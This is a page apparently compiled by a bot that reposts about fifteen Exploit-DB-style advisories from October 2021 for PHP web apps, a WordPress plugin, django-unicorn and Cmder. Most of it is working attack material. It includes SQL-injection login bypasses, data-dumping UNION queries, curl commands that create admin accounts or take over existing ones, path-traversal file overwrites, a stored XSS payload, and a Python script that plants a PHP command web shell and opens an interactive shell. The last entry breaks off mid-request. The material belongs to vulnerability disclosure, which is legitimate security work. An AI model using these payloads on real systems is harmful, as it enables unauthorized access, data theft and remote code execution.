All posts by ISHACK AI BOT
-
IFSC Code Finder Project 1.0 - SQL injection (Unauthenticated)
# Title: IFSC Code Finder Project 1.0 - SQL injection (Unauthenticated)
# Exploit Author: Yash Mahajan
# Date: 2021-10-07
# Vendor Homepage: https://phpgurukul.com/ifsc-code-finder-project-using-php/
# Version: 1
# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=14478
# Tested On: Windows 10, XAMPP
# Vulnerable Parameter: searchifsccode

Steps to Reproduce:

1) Navigate to http://127.0.0.1/ifscfinder/, enter any number in the search field and capture the request in Burp Suite.
2) Paste the request below into Burp Repeater, and also save it to a text file (request.txt).

Request:
========
POST /ifscfinder/search.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 79
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/ifscfinder/
Cookie: PHPSESSID=5877lg2kv4vm0n5sb8e1eb0d0k
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

searchifsccode=')+AND+(SELECT+3757+FROM+(SELECT(SLEEP(20)))lygy)--+fvnT&search=

--------------------------------------------------------------------------------

3) You will see a time delay of 20 seconds in the response.
4) python sqlmap.py -r request.txt -p searchifsccode --dbs
5) The above sqlmap command retrieves all databases.
-
Simple Online College Entrance Exam System 1.0 - SQLi Authentication Bypass
# Exploit Title: Simple Online College Entrance Exam System 1.0 - SQLi Authentication Bypass
# Date: 07.10.2021
# Exploit Author: Mevlüt Yılmaz
# Vendor Homepage: https://www.sourcecodester.com/php/14976/simple-online-college-entrance-exam-system-php-and-sqlite-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14976&title=Simple+Online+College+Entrance+Exam+System+in+PHP+and+SQLite+Free+Source+Code
# Version: 1.0
# Tested on: Windows 10, Kali Linux

# Simple Online College Entrance Exam System v1.0

The login page can be bypassed with a simple SQLi in the username parameter.

Steps To Reproduce:

1 - Go to the login page http://localhost/entrance_exam/admin/login.php
2 - Enter the payload "admin' or '1'='1" (without double quotes) into the username field and type anything into the password field.
3 - Click the "Login" button and you are logged in as administrator.

PoC

POST /entrance_exam/Actions.php?a=login HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 45
Origin: http://localhost
Connection: close
Referer: http://localhost/entrance_exam/admin/login.php
Cookie: PHPSESSID=57upokqf37b2fjs4o5tc84cd8n

username=admin'+or+'1'%3D'1&password=anything
-
Online Traffic Offense Management System 1.0 - Privilege escalation (Unauthenticated)
# Exploit Title: Online Traffic Offense Management System 1.0 - Privilege escalation (Unauthenticated)
# Date: 07/10/2021
# Exploit Author: Hubert Wojciechowski
# Contact Author: [email protected]
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html
# Version: 1.0
# Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23

### Privilege escalation

# All requests can be sent by both an authenticated and a non-authenticated user
# The vulnerabilities in the application allow for:
* Reading any PHP file from the server
* Saving files to parent and child directories and overwriting files on the server
* Performing operations by an unauthenticated user with application administrator rights

-----------------------------------------------------------------------------------------------------------------------
# POC
-----------------------------------------------------------------------------------------------------------------------

## Example 1 - Reading any PHP file from the server

Example vulnerable scripts:
http://localhost/traffic_offense/index.php?p=
http://localhost/traffic_offense/admin/?page=

# Request reading the rrr.php file of another user on the server
GET /traffic_offense/index.php?p=../phpwcms2/rrr HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close

-----------------------------------------------------------------------------------------------------------------------
# Response
HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 10:09:35 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Connection: close

[...]
</br></br>Hacked file other user in serwer!</br></br>
[...]

-----------------------------------------------------------------------------------------------------------------------

## Example 2 - Saving files to parent and child directories and overwriting files on the server

# Request to read the file
GET /traffic_offense/index.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Connection: close

-----------------------------------------------------------------------------------------------------------------------
# Response
HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 10:30:56 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Set-Cookie: PHPSESSID=330s5p4flpokvjpl4nvfp4dj2t; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15095

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Online Traffic Offense Management System - PHP</title>
[...]

-----------------------------------------------------------------------------------------------------------------------
# Request to overwrite the file index.php in the web app's main directory
POST /traffic_offense/classes/Master.php?f=save_driver HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------329606699635951312463334027403
Content-Length: 1928
Origin: http://localhost
Connection: close
Referer: http://localhost/traffic_offense/admin/?page=drivers/manage_driver&id=4
Cookie: PHPSESSID=2nkvkfftfjckjeqfkt6917vnu7
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="id"

5/../../../index
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="license_id_no"

GBN-1020061
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="lastname"

Blake
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="firstname"

Claire
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="middlename"

C
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="dob"

1992-10-12
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="present_address"

Sample Addss 123
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="permanent_address"

Sample Addess 123
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="civil_status"

Married
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="nationality"

Filipino
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="contact"

09121789456
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="license_type"

Non-Professional
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="image_path"

uploads/drivers/
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="img"; filename="fuzzdb.php"
Content-Type: image/png

<?php echo "Hacked other client files in this hosting!"; ?>
-----------------------------329606699635951312463334027403--

# The new file gets the extension written in filename="fuzzdb.php"
# The new file's name and location come from 5/../../../index, so we can save the file in another directory ;)
# The line must start with a digit
# We can overwrite config files

-----------------------------------------------------------------------------------------------------------------------
# Response
HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 10:38:35 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8

{"status":"success"}

-----------------------------------------------------------------------------------------------------------------------
# Request to read the file index.php again
GET /traffic_offense/index.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Connection: close

-----------------------------------------------------------------------------------------------------------------------
# Response
HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 10:42:17 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Access-Control-Allow-Origin: *
Content-Length: 42
Connection: close
Content-Type: text/html; charset=UTF-8

Hacked other client files in this hosting!

-----------------------------------------------------------------------------------------------------------------------

## Example 4 - Performing operations by an unauthenticated user with application administrator rights

# The application allows you to perform many operations without authorization; it has no permission matrix. The entire application is vulnerable.

# Request adding a new admin user to the application, sent by an authorized user
POST /traffic_offense/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------210106920639395210803657370685
Content-Length: 949
Origin: http://localhost
Connection: close
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="id"

21
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="firstname"

hack
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="lastname"

hack
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="username"

hack
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="password"

hack
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="type"

1
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="img"; filename="aaa.php"
Content-Type: application/octet-stream

<?php phpinfo(); ?>
-----------------------------210106920639395210803657370685--

-----------------------------------------------------------------------------------------------------------------------
# Response
HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 10:50:36 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Set-Cookie: PHPSESSID=2l1p4103dtj3j3vrod0t6rk6pn; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 1
Connection: close
Content-Type: text/html; charset=UTF-8

1

# The request worked fine; log into the app using your "hack" account
-
django-unicorn 0.35.3 - Stored Cross-Site Scripting (XSS)
# Exploit Title: django-unicorn 0.35.3 - Stored Cross-Site Scripting (XSS)
# Date: 10/7/21
# Exploit Author: Raven Security Associates, Inc. (ravensecurity.net)
# Software Link: https://pypi.org/project/django-unicorn/
# Version: <= 0.35.3
# CVE: CVE-2021-42053

django-unicorn <= 0.35.3 suffers from a stored XSS vulnerability by improperly escaping data from AJAX requests.

Step 1: Go to www.django-unicorn.com/unicorn/message/todo
Step 2: Enter an XSS payload in the todo form (https://portswigger.net/web-security/cross-site-scripting/cheat-sheet).

POC:

POST /unicorn/message/todo HTTP/2
Host: www.django-unicorn.com
Cookie: csrftoken=EbjPLEv70y1yPrNMdeFg9pH8hNVBgkrepSzuMM9zi6yPviifZKqQ3uIPJ4hsFq3z
Content-Length: 258
Sec-Ch-Ua: ";Not A Brand";v="99", "Chromium";v="94"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Content-Type: text/plain;charset=UTF-8
Accept: application/json
X-Requested-With: XMLHttpRequest
X-Csrftoken: EbjPLEv70y1yPrNMdeFg9pH8hNVBgkrepSzuMM9zi6yPviifZKqQ3uIPJ4hsFq3z
Sec-Ch-Ua-Platform: "Linux"
Origin: https://www.django-unicorn.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.django-unicorn.com/examples/todo
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

{"id":"Q43GSmJh","data":{"task":"","tasks":[]},"checksum":"4ck2yTwX","actionQueue":[{"type":"syncInput","payload":{"name":"task","value":"<img src=x onerror=alert(origin)>"}},{"type":"callMethod","payload":{"name":"add"},"partial":{}}],"epoch":1633578678871}

--------------------------------------------------------------------------------

HTTP/2 200 OK
Date: Thu, 07 Oct 2021 03:51:18 GMT
Content-Type: application/json
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin
Via: 1.1 vegur
Cf-Cache-Status: DYNAMIC
Expect-Ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=b4nQavto8LK9ru7JfhbNimKP71ZlMtduJTy6peHCwxDVWBH2Mkn0f7O%2FpWFy1FgPTd6Z6FmfkYUw5Izn59zN6kTQmjNjddiPWhWCWZWwOFiJf45ESQxuxr44UeDv3w51h1Ri6ESnNE5Y"}],"group":"cf-nel","max_age":604800}
Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
Cf-Ray: 69a42b973f6a6396-ORD
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400

{"id": "Q43GSmJh", "data": {"tasks": ["<img src=x onerror=alert(origin)>"]}, "errors": {}, "checksum": "ZQn54Ct4", "dom": "<div unicorn:id=\"Q43GSmJh\" unicorn:name=\"todo\" unicorn:key=\"\" unicorn:checksum=\"ZQn54Ct4\">\n<form unicorn:submit.prevent=\"add\">\n<input type=\"text\" unicorn:model.lazy=\"task\" placeholder=\"New task\" id=\"task\"/>\n</form>\n<button unicorn:click=\"add\">Add</button>\n<p>\n<ul>\n<li><img src=x onerror=alert(origin)></li>\n</ul>\n<button unicorn:click=\"$reset\">Clear all tasks</button>\n</p>\n</div>\n", "return": {"method": "add", "params": [], "value": null}}
-
Maian-Cart 3.8 - Remote Code Execution (RCE) (Unauthenticated)
# Exploit title: Maian-Cart 3.8 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 27.11.2020 19:35
# Tested on: Ubuntu 20.04 LTS
# Exploit Author(s): DreyAnd, purpl3
# Software Link: https://www.maiancart.com/download.html
# Vendor homepage: https://www.maianscriptworld.co.uk/
# Version: Maian Cart 3.8
# CVE: CVE-2021-32172

#!/usr/bin/python3
import argparse
import requests
from bs4 import BeautifulSoup
import sys
import json
import time

parser = argparse.ArgumentParser()
parser.add_argument("host", help="Host to exploit (with http/https prefix)")
parser.add_argument("dir", help="default=/ , starting directory of the maian-cart instance, sometimes is placed at /cart or /maiancart")
args = parser.parse_args()

# args
host = sys.argv[1]
directory = sys.argv[2]

# CREATE THE FILE
print("\033[95mCreating the file to write payload to...\n\033[00m", flush=True)
time.sleep(1)
try:
    r = requests.get(f"{host}{directory}/admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name=shell.php&target=l1_Lw")
    print(r.text)
    if "added" in r.text:
        print("\033[95mFile successfully created.\n\033[00m")
    else:
        print("\033[91mSome error occurred.\033[00m")
except (requests.exceptions.RequestException):
    print("\033[91mThere was a connection issue. Check if you're connected to wifi or if the host is correct\033[00m")

# GET THE FILE ID
time.sleep(1)
file_response = r.text
soup = BeautifulSoup(file_response, 'html.parser')
site_json = json.loads(soup.text)
hash_id = [h.get('hash') for h in site_json['added']]
file_id = str(hash_id).replace("['", "").replace("']", "")
print("\033[95mGot the file id: ", "\033[91m", file_id, "\033[00m")
print("\n")

# WRITE TO THE FILE
print("\033[95mWriting the payload to the file...\033[00m")
print("\n")
time.sleep(1)
headers = {
    "Accept": "application/json, text/javascript, /; q=0.01",
    "Accept-Language": "en-US,en;q=0.5",
    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
    "X-Requested-With": "XMLHttpRequest",
    "Connection": "keep-alive",
    "Pragma": "no-cache",
    "Cache-Control": "no-cache",
}
data = f"cmd=put&target={file_id}&content=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%20%3F%3E"
try:
    write = requests.post(f"{host}{directory}/admin/index.php?p=ajax-ops&op=elfinder", headers=headers, data=data)
    print(write.text)
except (requests.exceptions.RequestException):
    print("\033[91mThere was a connection issue. Check if you're connected to wifi or if the host is correct\033[00m")

# EXECUTE THE PAYLOAD
print("\033[95mExecuting the payload...\033[00m")
print("\n")
time.sleep(1)
exec_host = f"{host}{directory}/product-downloads/shell.php"
print(f"\033[92mGetting a shell. To stop it, press CTRL + C. Browser url: {host}{directory}/product-downloads/shell.php?cmd=\033[00m")
time.sleep(2)

while True:
    def main():
        execute = str(input("$ "))
        e = requests.get(f"{exec_host}?cmd={execute}")
        print(e.text)

    try:
        if __name__ == "__main__":
            main()
    except:
        exit = str(input("Do you really wish to exit? Y/N? "))
        if exit == "Y" or exit == "y":
            print("\033[91mExit detected. Removing the shell...\033[00m")
            remove = requests.get(f"{host}{directory}/admin/index.php?p=ajax-ops&op=elfinder&cmd=rm&targets%5B%5D={file_id}")
            print("\033[91m", remove.text, "\033[00m")
            print("\033[91mBye!\033[00m")
            sys.exit(1)
        else:
            main()
-
WordPress Plugin Pie Register 3.7.1.4 - Admin Privilege Escalation (Unauthenticated)
# Exploit Title: WordPress Plugin Pie Register 3.7.1.4 - Admin Privilege Escalation (Unauthenticated)
# Google Dork: inurl:/plugins/pie-register/
# Date: 08.10.2021
# Exploit Author: Lotfi13-DZ
# Vendor Homepage: https://wordpress.org/plugins/pie-register/
# Software Link: https://downloads.wordpress.org/plugin/pie-register.3.7.1.4.zip
# Version: <= 3.7.1.4
# Tested on: ubuntu

Vulnerable arg: [user_id_social_site=1] <== will return the authentication cookies for user 1 (admin).

Exploit:

wget -q -S -O - http://localhost/ --post-data 'user_id_social_site=1&social_site=true&piereg_login_after_registration=true&_wp_http_referer=/login/&log=null&pwd=null' > /dev/null
-
Simple Online College Entrance Exam System 1.0 - Unauthenticated Admin Creation
# Exploit Title: Simple Online College Entrance Exam System 1.0 - Unauthenticated Admin Creation
# Date: 07.10.2021
# Exploit Author: Amine ismail @aminei_
# Vendor Homepage: https://www.sourcecodester.com/php/14976/simple-online-college-entrance-exam-system-php-and-sqlite-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14976&title=Simple+Online+College+Entrance+Exam+System+in+PHP+and+SQLite+Free+Source+Code
# Version: 1.0
# Tested on: Windows 10, Kali Linux

# Unauthenticated admin creation

Unauthenticated admin creation:

Request:

POST /entrance_exam/Actions.php?a=save_admin HTTP/1.1
Host: 127.0.0.1
Content-Length: 42

id=&fullname=admin2&username=admin2&type=1

PoC to create an admin user named exploitdb with password exploitdb:

curl -d "id=&fullname=admin&username=exploitdb&type=1&password=916b5dbd201b469998d9b4a4c8bc4e08" -X POST 'http://127.0.0.1/entrance_exam/Actions.php?a=save_admin'
-
Simple Online College Entrance Exam System 1.0 - Account Takeover
# Exploit Title: Simple Online College Entrance Exam System 1.0 - Account Takeover
# Date: 07.10.2021
# Exploit Author: Amine ismail @aminei_
# Vendor Homepage: https://www.sourcecodester.com/php/14976/simple-online-college-entrance-exam-system-php-and-sqlite-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14976&title=Simple+Online+College+Entrance+Exam+System+in+PHP+and+SQLite+Free+Source+Code
# Version: 1.0
# Tested on: Windows 10, Kali Linux

# Unauthenticated password change leading to account takeover

Explanation:

By setting the parameter old_password as an array, the MD5 function on it returns null, so md5($old_password) == $_SESSION['password'] since we have no session, thus bypassing the check; after that we can use SQLi and inject our custom data.

Request:

POST /entrance_exam/Actions.php?a=update_credentials HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 129

id=4&username=test',`password`='916b5dbd201b469998d9b4a4c8bc4e08'+WHERE+admin_id=4;%23&password=commented_out&old_password[]=test

Vulnerable code in Actions.php:

function update_credentials(){
    extract($_POST);
    $data = "";
    foreach($_POST as $k => $v){
        if(!in_array($k,array('id','old_password')) && !empty($v)){
            if(!empty($data)) $data .= ",";
            if($k == 'password') $v = md5($v);
            $data .= " `{$k}` = '{$v}' ";
        }
    }
    ...
    if(!empty($password) && md5($old_password) != $_SESSION['password']){
        $resp['status'] = 'failed';
        $resp['msg'] = "Old password is incorrect.";
    }else{
        $sql = "UPDATE `admin_list` set {$data} where admin_id = '{$_SESSION['admin_id']}'";
        @$save = $this->query($sql);

PoC that changes the password and username of user 'admin' to 'exploitdb':

curl -d "username=exploitdb',%60password%60='916b5dbd201b469998d9b4a4c8bc4e08' WHERE admin_id=1;%23&password=useless&old_password[]=useless" -X POST 'http://127.0.0.1/entrance_exam/Actions.php?a=update_credentials'
-
Simple Online College Entrance Exam System 1.0 - 'Multiple' SQL injection
# Exploit Title: Simple Online College Entrance Exam System 1.0 - 'Multiple' SQL injection
# Date: 07.10.2021
# Exploit Author: Amine ismail @aminei_
# Vendor Homepage: https://www.sourcecodester.com/php/14976/simple-online-college-entrance-exam-system-php-and-sqlite-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14976&title=Simple+Online+College+Entrance+Exam+System+in+PHP+and+SQLite+Free+Source+Code
# Version: 1.0
# Tested on: Windows 10, Kali Linux

# Multiple SQL injections

The following PoCs will leak the admin username and password:

Unauthenticated:
http://127.0.0.1/entrance_exam/take_exam.php?id=%27+UNION+SELECT+1,username||%27;%27||password,3,4,5,6,7+FROM+admin_list;

Admin:
http://127.0.0.1/entrance_exam/admin/view_enrollee.php?id=1'+UNION+SELECT+1,2,3,4,5,6,password,username,9,10,11,12,13,14,15+FROM+admin_list;
-
Online Enrollment Management System 1.0 - Authentication Bypass
# Exploit Title: Online Enrollment Management System 1.0 - Authentication Bypass
# Date: 07.10.2021
# Exploit Author: Amine ismail @aminei_
# Vendor Homepage: https://www.sourcecodester.com/php/12914/online-enrollment-management-system-paypal-payments-phpmysqli.html
# Software Link: https://www.sourcecodester.com/php/12914/online-enrollment-management-system-paypal-payments-phpmysqli.html
# Version: 1.0
# Tested on: Windows 10, Kali Linux

# Admin panel authentication bypass

Admin panel authentication can be bypassed due to a SQL injection in the login form:

Request:

POST /OnlineEnrolmentSystem/admin/login.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 63
Cookie: PHPSESSID=jd2phsg2f7pvv2kfq3lgfkc98q

user_email=admin'+OR+1=1+LIMIT+1;--+-&user_pass=admin&btnLogin=

PoC:

curl -d "user_email=admin' OR 1=1 LIMIT 1;--+-&user_pass=junk&btnLogin=" -X POST http://127.0.0.1/OnlineEnrolmentSystem/admin/login.php
-
Online Employees Work From Home Attendance System 1.0 - SQLi Authentication Bypass
# Exploit Title: Online Employees Work From Home Attendance System 1.0 - SQLi Authentication Bypass
# Date: 08.10.2021
# Exploit Author: Merve Oral
# Vendor Homepage: https://www.sourcecodester.com/php/14981/online-employees-work-home-attendance-system-php-and-sqlite-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14981&title=Online+Employees+Work+From+Home+Attendance+System+in+PHP+and+SQLite+Free+Source+Code
# Version: 1.0
# Tested on: Windows 10, Kali Linux

# Online Employees Work From Home Attendance System/Logs in a Web App v1.0

The login page can be bypassed with a simple SQLi in the username parameter.

Steps To Reproduce:

1 - Go to the login page http://localhost/audit_trail/login.php
2 - Enter the payload "admin' or '1'='1" (without double quotes) into the username field and type anything into the password field.
3 - Click the "Login" button and you are logged in as administrator.

PoC

POST /wfh_attendance/Actions.php?a=login HTTP/1.1
Host: merve
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 40
Origin: http://merve
Connection: close
Referer: http://merve/wfh_attendance/admin/login.php
Cookie: PHPSESSID=55nnlgv0kg2qaki92o2s9vl5rq

username=admin'+or+'1'%3D'1&password=any
-
Loan Management System 1.0 - SQLi Authentication Bypass
# Exploit Title: Loan Management System 1.0 - SQLi Authentication Bypass
# Date: 08.10.2021
# Exploit Author: Merve Oral
# Vendor Homepage: https://www.sourcecodester.com/php/14471/loan-management-system-using-phpmysql-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14471&title=Loan+Management+System+using+PHP%2FMySQL+with+Source+Code
# Version: 1.0
# Tested on: Windows 10, Kali Linux

# Loan Management System

The login page can be bypassed with a simple SQLi in the username parameter.

Steps To Reproduce:

1 - Go to the login page http://localhost/audit_trail/login.php
2 - Enter the payload "admin' or '1'='1'#" (without double quotes) into the username field and type anything into the password field.
3 - Click the "Login" button and you are logged in as administrator.

PoC

POST /loan/ajax.php?action=login HTTP/1.1
Host: merve
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 44
Origin: http://merve
Connection: close
Referer: http://merve/loan/login.php
Cookie: PHPSESSID=911fclrpoa87v9dsp9lh28ck0h

username=admin'+or+'1'%3D'1'%23&password=any
-
Cmder Console Emulator 1.3.18 - 'Cmder.exe' Denial of Service (PoC)
# Exploit Title: Cmder Console Emulator 1.3.18 - 'Cmder.exe' Denial of Service (PoC)
# Date: 2021-10-07
# Exploit Author: Aryan Chehreghani
# Vendor Homepage: https://cmder.net
# Software Link: https://github.com/cmderdev/cmder/releases/download/v1.3.18/cmder.zip
# Version: v1.3.18
# Tested on: Windows 10

# [About - Cmder Console Emulator] :

# Cmder is a software package created over the absence of a usable console emulator on Windows.
# It is based on ConEmu with a major config overhaul, comes with a Monokai color scheme, amazing clink (further enhanced by clink-completions) and a custom prompt layout.

# [Security Issue] :

# Requires the execution of a .cmd file type; the created file is entered into the emulator, which will trigger the buffer overflow condition.
# E.g. λ cmder.cmd

# [POC] :

PAYLOAD = chr(235) + "\\CMDER"
PAYLOAD = PAYLOAD * 3000

with open("cmder.cmd", "w") as f:
    f.write(PAYLOAD)
-
Simple Payroll System 1.0 - SQLi Authentication Bypass
# Exploit Title: Simple Payroll System 1.0 - SQLi Authentication Bypass
# Date: 2021-10-09
# Exploit Author: Yash Mahajan
# Vendor Homepage: https://www.sourcecodester.com/php/14974/simple-payroll-system-dynamic-tax-bracket-php-using-sqlite-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/simple_payroll_0.zip
# Version: 1.0
# Tested on: Windows 10

# Description: Simple Payroll System v1.0 Login page can be bypassed with a SQLi into the username parameter.

Steps To Reproduce:

1 - Navigate to http://localhost/simple_payroll/admin/login.php
2 - Enter the payload into the username field as "' or 1=1-- " without double-quotes and type anything into the password field.
3 - Click on "Login" button and you are logged in as administrator.

Proof Of Concept:

POST /simple_payroll/Actions.php?a=login HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 37
Origin: http://localhost
Connection: close
Referer: http://localhost/simple_payroll/admin/login.php
Cookie: PHPSESSID=ijad04l4pfb2oec6u2vmi4ll9p
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

username='+or+1%3D1--+&password=admin
-
Company's Recruitment Management System 1.0 - 'Multiple' SQL Injection (Unauthenticated)
# Title: Company's Recruitment Management System 1.0 - 'Multiple' SQL Injection (Unauthenticated)
# Exploit Author: Yash Mahajan
# Date: 2021-10-09
# Vendor Homepage: https://www.sourcecodester.com/php/14959/companys-recruitment-management-system-php-and-sqlite-free-source-code.html
# Version: 1
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/employment_application.zip
# Tested On: Windows 10, XAMPP
# Vulnerable Parameters: "id" , "username"

Steps to Reproduce:

A) SQL Injection (Authentication Bypass)

1) Navigate to http://localhost/employment_application/admin/login.php
2) Enter the payload into the username field as "' or 1=1-- " without double-quotes and type anything into the password field.
3) Click on "Login" button and you are logged in as administrator.

Request:
========
POST /employment_application/Actions.php?a=login HTTP/1.1
Host: localhost
